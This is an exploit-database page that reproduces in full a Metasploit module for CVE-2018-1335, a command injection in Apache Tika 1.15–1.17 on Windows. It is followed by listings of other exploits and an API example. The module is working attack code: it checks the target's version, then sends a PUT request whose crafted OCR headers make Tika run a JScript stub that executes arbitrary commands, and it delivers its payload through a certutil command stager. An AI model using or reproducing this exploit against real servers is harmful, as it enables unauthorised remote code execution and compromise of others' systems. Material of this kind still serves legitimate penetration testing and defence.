Menu

Search for hundreds of thousands of exploits

"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)"

Author

Metasploit

Platform

windows

Release date

2019-08-05

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Tika Header Command Injection',
      'Description'    => %q{
          This module exploits a command injection vulnerability in Apache
        Tika 1.15 - 1.17 on Windows.  A file with the image/jp2 content-type is
        used to bypass magic bytes checking.  When OCR is specified in the
        request, parameters can be passed to change the parameters passed
        at command line to allow for arbitrary JScript to execute. A
        JScript stub is passed to execute arbitrary code. This module was
        verified against version 1.15 - 1.17 on Windows 2012.
        While the CVE and finding show more versions vulnerable, during
        testing it was determined only > 1.14 was exploitable due to
        jp2 support being added.
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows',
            {'Arch' => [ARCH_X86, ARCH_X64],
            'Platform' => 'win',
            'CmdStagerFlavor' => ['certutil']
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 25 2018',
      'Author' =>
        [
          'h00die', # msf module
          'David Yesland', # edb submission
          'Tim Allison' # discovery
        ],
      'References' =>
        [
          ['EDB', '46540'],
          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
          ['CVE', '2018-1335']
        ]))

    register_options(
      [
        Opt::RPORT(9998),
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [true, 'Override check result', false])
      ])
  end

  def check
    res = send_request_cgi({
             'uri'    => normalize_uri(target_uri),
           })
    if res.nil?
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    elsif res.code != 200
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    end

    if res.body =~ /Apache Tika (\d.[\d]+)/
      version = Gem::Version.new($1)
      vprint_status("Apache Tika Version Detected: #{version}")
      if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
        return CheckCode::Vulnerable
      end
    end
    CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    cmd.gsub(/"/, '\"')
    jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"

    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
    res = send_request_cgi({
             'method' => 'PUT',
             'uri'    => normalize_uri(target_uri, 'meta'),
             'headers' => {
                "X-Tika-OCRTesseractPath" => '"cscript"',
                "X-Tika-OCRLanguage"      => "//E:Jscript",
                "Expect"                  => "100-continue",
                "Content-type"            => "image/jp2",
                "Connection"              => "close"},
             'data' => jscript
           })

    fail_with(Failure::Disconnected, 'No server response') unless res
    unless (res.code == 200 && res.body.include?('tika'))
      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
    end
  end

  def exploit
    checkcode = check
    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
      print_error("#{checkcode[1]}. Set ForceExploit to override.")
      return
    end

    execute_cmdstager(linemax: 8000)
  end
end
Release Date Title Type Platform Author
2019-08-19 "RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service" dos windows Achilles
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-14 "ManageEngine opManager 12.3.150 - Authenticated Code Execution" webapps windows kindredsec
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2019-08-14 "Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion" local windows "Abdelhamid Naceri"
2019-08-12 "Steam Windows Client - Local Privilege Escalation" local windows AbsoZed
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-26 "Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation" local windows ShivamTrivedi
Release Date Title Type Platform Author
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2019-07-29 "WP Database Backup < 5.2 - Remote Code Execution (Metasploit)" remote php Metasploit
2019-07-29 "Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)" remote unix Metasploit
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)" remote linux Metasploit
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-03 "Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)" remote windows Metasploit
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47208/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47208/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47208/41583/apache-tika-115-117-header-command-injection-metasploit/download/", "exploit_id": "47208", "exploit_description": "\"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)\"", "exploit_date": "2019-08-05", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse